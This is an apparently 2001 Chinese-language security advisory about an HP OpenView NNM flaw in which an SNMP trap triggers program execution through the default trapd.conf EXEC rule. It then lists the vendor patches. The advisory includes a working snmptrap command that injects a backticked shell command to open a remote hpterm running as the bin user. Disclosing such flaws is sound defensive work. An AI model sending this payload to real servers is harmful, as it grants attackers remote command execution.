HP Openview NNM 漏洞

/ns/ld/softld/data/20010613024207.htm

涉及程序：
HP Openview NNM

描述：
利用 HP Openview NNM 漏洞远程启动服务器上的程序

详细：
HP Openview NNM ( Network Node Manager) 是一种大型网络管理软件。但是近日发现它存在漏洞，远程攻击者通过发送一个 SNMP TRAP,能启动服务器上的程序。在缺省状态下，trapd.conf 定义如下：
#
EVENT
OV_MgX_NNM_Generic .1.3.6.1.4.1.11.2.17.1.0.6000
0208 "Configuration Alarms" Warning
FORMAT Generic NNM to MgX message. $12
EXEC echo snmpnotify -v 1 -e 1.3.6.1.4.1.11.2.17.1
$10 1.3.[snip...]
#

攻击者通过发送如下 trap 指令：

snmptrap -v 1 .1.3.6.1.4.1.11.2.17.1
1.2.3.4 6 60000208 0 1 s "" 2 s "" 3
s "\`/usr/bin/X11/hpterm -display display>\`" 4 s "" [snip...] 12 s ""

能够得到一个以 BIN 用户身分运行的 hpterm

受影响系统：
HP Openview NNM6.1 及之前版本

受影响平台：
UNIX


解决方案：

1、安装补丁 PHSS_24202 (注意：此补丁依赖于 PHSS_22423）

HP 下载：
http://support.openview.hp.com/load.jsp?type=ov_patch&name=PHSS_24202
http://support.openview.hp.com/load.jsp?type=ov_patch&name=PHSS_22423


2、请 NNM 6.1 用户注意，从2001年7月31日之后，HP 将不再发布 NNM 6.1 补丁，CNNS 建议您升级到 NNM 6.2

HP 下载：http://ovweb.external.hp.com/nnm/NNM6.2/images/nnm/